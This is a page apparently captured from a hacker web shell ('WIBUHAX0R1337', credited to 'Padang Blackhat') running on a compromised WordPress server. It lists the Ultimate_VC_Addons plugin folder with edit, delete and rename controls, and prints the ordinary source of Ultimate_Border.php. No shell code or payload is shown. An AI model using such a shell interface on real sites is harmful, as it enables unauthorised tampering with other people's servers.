-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-contentVIp
/
plugins
/
Ultimate_VC_Addons
/
params
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
Ultimate_Animator.php
2.671KB
Edit File
Delete File
Rename
Ultimate_Border.php
13.222KB
Edit File
Delete File
Rename
Ultimate_BoxShadow.php
8.974KB
Edit File
Delete File
Rename
Ultimate_Button.php
3.065KB
Edit File
Delete File
Rename
Ultimate_ColorPicker.php
2.84KB
Edit File
Delete File
Rename
Ultimate_DateTime_Picker.php
1.553KB
Edit File
Delete File
Rename
Ultimate_Font_Manager_Param.php
2.374KB
Edit File
Delete File
Rename
Ultimate_Gradient.php
8.392KB
Edit File
Delete File
Rename
Ultimate_Icon_Manager_Param.php
3.334KB
Edit File
Delete File
Rename
Ultimate_Image_Single.php
9.44KB
Edit File
Delete File
Rename
Ultimate_Margin.php
1.525KB
Edit File
Delete File
Rename
Ultimate_Navigation.php
3.811KB
Edit File
Delete File
Rename
Ultimate_Number.php
1.389KB
Edit File
Delete File
Rename
Ultimate_Radio_Image.php
4.098KB
Edit File
Delete File
Rename
Ultimate_Responsive.php
7.05KB
Edit File
Delete File
Rename
Ultimate_Select.php
1.947KB
Edit File
Delete File
Rename
Ultimate_Switch.php
2.811KB
Edit File
Delete File
Rename
<?php if(!class_exists('Ultimate_Border')) { class Ultimate_Border { function __construct() { add_action( 'admin_enqueue_scripts', array( $this, 'ultimate_border_param_scripts' ) ); if(defined('WPB_VC_VERSION') && version_compare(WPB_VC_VERSION, 4.8) >= 0) { if(function_exists('vc_add_shortcode_param')) { vc_add_shortcode_param('ultimate_border', array($this, 'ultimate_border_callback'), plugins_url('../admin/vc_extend/js/ultimate-border.js',__FILE__)); } } else { if(function_exists('add_shortcode_param')) { add_shortcode_param('ultimate_border', array($this, 'ultimate_border_callback'), plugins_url('../admin/vc_extend/js/ultimate-border.js',__FILE__)); } } } function ultimate_border_callback($settings, $value) { $dependency = ''; $positions = $settings['positions']; $enable_radius = isset($settings['enable_radius']) ? $settings['enable_radius'] : true ; $label = isset($settings['label_border']) ? $settings['label_border'] : 'Border Style'; $unit = isset($settings['unit']) ? $settings['unit'] : 'px'; $uid = 'ultimate-border-'. rand(1000, 9999); //$settings['param_name']; //$uid = uniqid('ultimate-border-'. $settings['param_name'] .'-'. rand()); $html = '<div class="ultimate-border" id="'.$uid.'" data-unit="'.$unit.'" >'; /** BORDER - {STYLE} *---------------------------------------------------*/ $html .= '<div class="ultimate-border-style-section">'; //$html .= ' <div class="label">'; //$html .= $label; //$html .= ' </div>'; $html .= ' <div class="ultimate-border-select-block">'; $html .= ' <select data-placeholder="Border Style" class="ultimate-border-style-selector" >'; $html .= ' <option value="none">'.__('None', 'ultimate_vc').'</option>'; $html .= ' <option value="solid">'.__('Solid', 'ultimate_vc').'</option>'; $html .= ' <option value="dotted">'.__('Dotted', 'ultimate_vc').'</option>'; $html .= ' <option value="dashed">'.__('Dashed', 'ultimate_vc').'</option>'; $html .= ' <option value="hidden">'.__('Hidden', 'ultimate_vc').'</option>'; $html .= ' <option value="double">'.__('Double', 'ultimate_vc').'</option>'; $html .= ' <option value="groove">'.__('Groove', 'ultimate_vc').'</option>'; $html .= ' <option value="ridge">'.__('Ridge', 'ultimate_vc').'</option>'; $html .= ' <option value="inset">'.__('Inset', 'ultimate_vc').'</option>'; $html .= ' <option value="outset">'.__('Outset', 'ultimate_vc').'</option>'; $html .= ' <option value="initial">'.__('Initial', 'ultimate_vc').'</option>'; $html .= ' <option value="inherit">'.__('Inherit', 'ultimate_vc').'</option>'; $html .= ' </select>'; $html .= ' </div>'; $html .= '</div>'; /** BORDER - {WIDTH} *---------------------------------------------------*/ $label = "Border Width"; if(isset($settings['label_width']) && $settings['label_width']!='' ) { $label = $settings['label_width']; } $html .= '<div class="ultimate-four-input-section ultb-width-section" >'; $html .= ' <div class="label">'; $html .= $label; $html .= ' </div>'; $html .= '<div class="ult-expand "> <span class="ult-tooltip">Expand / Collapse</span> <i class="dashicons dashicons-minus"></i></div>'; foreach($positions as $key => $default_value) { switch ($key) { case 'Top': $id = 'border-' .strtolower($key). '-width'; $dashicon = 'dashicons dashicons-arrow-up-alt'; $html .= $this->ultimate_border_param_item($dashicon, /*$mode,*/ $unit, /*$default_value,*/$default_value, $key, $id); break; case 'Right': $id = 'border-' .strtolower($key). '-width'; $dashicon = 'dashicons dashicons-arrow-right-alt'; $html .= $this->ultimate_border_param_item($dashicon, /*$mode,*/ $unit, /*$default_value,*/$default_value, $key, $id); break; case 'Bottom': $id = 'border-' .strtolower($key). '-width'; $dashicon = 'dashicons dashicons-arrow-down-alt'; $html .= $this->ultimate_border_param_item($dashicon, /*$mode,*/ $unit, /*$default_value,*/$default_value, $key, $id); break; case 'Left': $id = 'border-' .strtolower($key). '-width'; $dashicon = 'dashicons dashicons-arrow-left-alt'; $html .= $this->ultimate_border_param_item($dashicon, /*$mode,*/ $unit, /*$default_value,*/$default_value, $key, $id); break; } } // {all} - border width $html .= ' <div class="ultimate-border-input-block ultb-width-all">'; $html .= ' <span class="ultimate-border-icon">'; $html .= ' <i class="dashicons dashicons-editor-expand"></i>'; $html .= ' </span>'; $html .= ' <input type="text" class="ultimate-border-inputs ultimate-border-input" data-unit="'.$unit.'" data-default="'.$default_value.'" data-id="border-width" placeholder="all" />'; $html .= ' </div>'; // set units - px, em, % $html .= '<div class="ultimate-unit-section">'; //$html .= ' <label>'.$unit.'</label>'; $html .= ' <select class="ult-unit-border-width" >'; switch($unit) { case "px": $html .= ' <option value="px" selected>px</option>'; $html .= ' <option value="em">em</option>'; break; case "em": $html .= ' <option value="em" selected>em</option>'; $html .= ' <option value="px">px</option>'; break; } $html .= ' </select>'; $html .= '</div>'; $html .= '</div><!-- .ultimate-four-input-section -->'; /** BORDER - {RADIUS} *---------------------------------------------------*/ if($enable_radius) : $label = "Border Radius"; if(isset($settings['label_radius']) && $settings['label_radius']!='' ) { $label = $settings['label_radius']; } $html .= '<div class="ultimate-border-radius-block ultb-radius-section" >'; $html .= ' <div class="label">'; $html .= $label; $html .= ' </div>'; $html .= ' <div class="ult-expand "> <span class="ult-tooltip">Expand / Collapse</span> <i class="dashicons dashicons-minus"></i></div>'; $radius = $settings['radius']; foreach($radius as $key => $default_value) { switch ($key) { case 'Top Left': $key = 'top-left-radius'; $dashicon = 'dashicons dashicons-arrow-up-alt'; $placeholder = 'T. Left'; $html .= $this->ultimate_border_radius_item($dashicon, /*$mode,*/ $unit, $default_value, /*$default_value,*//*$default_value,*/ $key, $placeholder); break; case 'Top Right': $key = 'top-right-radius'; $dashicon = 'dashicons dashicons-arrow-right-alt'; $placeholder = 'T. Right'; $html .= $this->ultimate_border_radius_item($dashicon, /*$mode,*/ $unit, $default_value, /*$default_value,*//*$default_value,*/ $key, $placeholder); break; case 'Bottom Right': $key = 'bottom-right-radius'; $dashicon = 'dashicons dashicons-arrow-down-alt'; $placeholder = 'B. Right'; $html .= $this->ultimate_border_radius_item($dashicon, /*$mode,*/ $unit, $default_value, /*$default_value,*//*$default_value,*/ $key, $placeholder); break; case 'Bottom Left': $key = 'bottom-left-radius'; $dashicon = 'dashicons dashicons-arrow-left-alt'; $placeholder = 'B. Left'; $html .= $this->ultimate_border_radius_item($dashicon, /*$mode,*/ $unit, $default_value, /*$default_value,*//*$default_value,*/ $key, $placeholder); break; } } // {all} - border radius $html .= ' <div class="ultimate-border-input-block ultb-radius-all">'; $html .= ' <span class="ultimate-border-icon">'; $html .= ' <i class="dashicons dashicons-editor-expand"></i>'; $html .= ' </span>'; $html .= ' <input type="text" class="ultimate-border-inputs ultimate-border-input" data-unit="'.$unit.'" data-default="'.$default_value.'" data-id="border-radius" placeholder="all" />'; $html .= ' </div>'; // set units - px, em, % $html .= '<div class="ultimate-unit-section">'; //$html .= ' <label>'.$unit.'</label>'; $html .= ' <select class="ult-unit-border-radius" >'; switch($unit) { case "px": $html .= ' <option value="px" selected>px</option>'; $html .= ' <option value="em">em</option>'; $html .= ' <option value="%">%</option>'; break; case "em": $html .= ' <option value="em" selected>em</option>'; $html .= ' <option value="px">px</option>'; $html .= ' <option value="%">%</option>'; break; case "%": $html .= ' <option value="%" selected>%</option>'; $html .= ' <option value="px">px</option>'; $html .= ' <option value="em">em</option>'; break; } $html .= ' </select>'; $html .= '</div>'; $html .= '</div>'; endif; // add color picker $label = "Border Color"; if(isset($settings['label_color']) && $settings['label_color']!='' ) { $label = $settings['label_color']; } $html .= ' <div class="ultimate-colorpicker-section">'; $html .= ' <div class="label">'; $html .= $label; $html .= ' </div>'; $html .= ' <div class="ultimate-colorpicker-block">'; $html .= ' <input name="" class="ultimate-colorpicker cs-wp-color-picker" data-id="border-color" type="text" value="" />'; $html .= ' </div>'; $html .= ' </div>'; $html .= ' <input type="hidden" data-unit="'.$unit.'" name="'.$settings['param_name'].'" class="wpb_vc_param_value ultimate-border-value '.$settings['param_name'].' '.$settings['type'].'_field" value="'.$value.'" '.$dependency.' />'; $html .= '</div>'; return $html; } function ultimate_border_radius_item($dashicon, /*$mode,*/ $unit,/* $default_value,*/$default_value, $key, $placeholder) { $html = ' <div class="ultimate-border-radius ultb-radius-single">'; $html .= ' <span class="ultimate-border-icon">'; $html .= ' <i class="'.$dashicon.'"></i>'; $html .= ' </span>'; $html .= ' <input type="text" class="ultimate-border-inputs ultimate-border-input" data-unit="'.$unit.'" data-default="'.$default_value.'" data-id="border-'.strtolower($key).'" placeholder="'.$placeholder.'" />'; $html .= ' </div>'; return $html; } function ultimate_border_param_item($dashicon, /*$mode,*/ $unit,/* $default_value,*/$default_value, $key, $id) { $html = ' <div class="ultimate-border-input-block ultb-width-single">'; $html .= ' <span class="ultimate-border-icon">'; $html .= ' <i class="'.$dashicon.'"></i>'; $html .= ' </span>'; $html .= ' <input type="text" class="ultimate-border-inputs ultimate-border-input" data-unit="'.$unit.'" data-default="'.$default_value.'" data-id="' .$id. '" placeholder="'.$key.'" />'; $html .= ' </div>'; return $html; } function ultimate_border_param_scripts($hook) { wp_register_style("ultimate-border-style",plugins_url('../admin/vc_extend/css/ultimate_border.css', __FILE__ )); if($hook == "post.php" || $hook == "post-new.php"){ $bsf_dev_mode = bsf_get_option('dev_mode'); if($bsf_dev_mode === 'enable') { wp_enqueue_style( 'wp-color-picker' ); wp_enqueue_style( 'ultimate-border-style'); wp_enqueue_style( 'ultimate-chosen-style'); wp_enqueue_script('ultimate-chosen-script'); } } } } } if(class_exists('Ultimate_Border')) { $Ultimate_Border = new Ultimate_Border(); }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat